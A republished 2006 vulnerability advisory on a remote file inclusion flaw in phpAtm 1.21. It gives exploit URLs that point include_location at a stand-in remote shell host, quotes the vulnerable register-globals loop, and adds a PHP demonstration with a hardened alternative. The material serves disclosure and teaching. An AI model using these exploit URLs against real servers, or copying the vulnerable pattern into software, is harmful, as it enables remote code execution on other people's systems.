phpAtm <= 1.21 (include_location) Remote File Include Vulnerabilities
Source: MHG Security Team  Author: KinSize  Published: 2006-08-31

########################################################################
# phpAtm <= v1.21 (include_location) Remote File Inclusion Exploit
#
# Level : Dangerous
# Download : http://phpatm.free.fr/
# Version : v1.21
#
# Found By: KinSize [MHG Security Team]
#
########################################################################
# Code : include($include_location.'include/conf.php');
#
# exploit:
# http://www.sitename.com/[script_path]/confirm.php?include_location=http://shellurl.com ?
# http://www.sitename.com/[script_path]/index.php?include_location=http://shellurl.com ?
# http://www.sitename.com/[script_path]/login.php?include_location=http://shellurl.com ?
########################################################################
#
# Contact : nefretaskimdir[at]gmail.com
#
# GreetZ : Damage-N | by_emr3 | by_OkSit | ESKOBAR | Ye.iL | PowerCobra | sys-worm(Turkish)| Z e b e r u S | ALL Turkish & MusLim
########################################################################

Added information:

At first glance this doesn't look vulnerable but then again:

lines 85-94 of common.php

// $sysarr: the request arrays gathered earlier in common.php (not shown on this page).
// Note: list()/each() iteration is PHP 4/5 era; each() is removed in PHP 8.
while (list(, $arr) = each($sysarr))
{
    if (is_array($arr))
    {
        while (list($key, $value) = each($arr))
        {
            // Every request key becomes a global, register_globals-style, so a
            // ?include_location=... parameter overwrites the variable that
            // include($include_location.'include/conf.php') builds its path from.
            $GLOBALS[$key] = $value;
        }
    }
}

/str0ke
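As an added example (not part of the advisory, and not phpAtm's own code), the PHP script below reproduces the copy loop quoted above against a constructed request, shows how it lets the query string replace $include_location before include() runs, and contrasts it with an allow-listed copy plus a local-only include base. The function names, the ALLOWED_REQUEST_KEYS list and the sample request are assumptions made for this example.

```php
<?php
// Constructed request: what $_GET holds after PHP parses the advisory's
// exploit URL (?include_location=http://shellurl.com/). $_POST is empty.
$sysarr = [['include_location' => 'http://shellurl.com/'], []];

// Vulnerable pattern, equivalent to common.php lines 85-94: every key of
// every request array is written straight into the global scope.
function globalsFromRequest(array $sysarr): void
{
    foreach ($sysarr as $arr) {
        if (!is_array($arr)) continue;
        foreach ($arr as $key => $value) {
            $GLOBALS[$key] = $value;
        }
    }
}

// Hardened copy: import only keys the application really expects; the
// include base is deliberately not among them (allow-list is hypothetical).
const ALLOWED_REQUEST_KEYS = ['page', 'file', 'sort'];

function safeGlobalsFromRequest(array $sysarr): array
{
    $vars = [];
    foreach ($sysarr as $arr) {
        if (!is_array($arr)) continue;
        foreach ($arr as $key => $value) {
            if (in_array($key, ALLOWED_REQUEST_KEYS, true)) {
                $vars[$key] = $value;
            }
        }
    }
    return $vars;
}

// Defence in depth for any path that still reaches include(): refuse URL
// wrappers (http://, ftp://, php://, data:; scheme of 2+ chars so a Windows drive
// letter is not mistaken for one) and NUL bytes. Pair with allow_url_include=Off.
function isLocalIncludePath(string $path): bool
{
    return !preg_match('#^[a-z][a-z0-9+.-]+:#i', $path) && strpos($path, "\0") === false;
}

$include_location = './';                // the script's intended default...
globalsFromRequest($sysarr);             // ...silently replaced by the request
echo 'vulnerable: ', $include_location . 'include/conf.php', PHP_EOL;

$vars = safeGlobalsFromRequest($sysarr); // include_location is simply dropped
$base = __DIR__ . '/';                   // fixed local base, never taken from $vars
echo 'hardened:   ', isLocalIncludePath($base) ? $base . 'include/conf.php' : 'rejected', PHP_EOL;
```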

CopyRight © 2002-2021 VFocuS.Net All Rights Reserved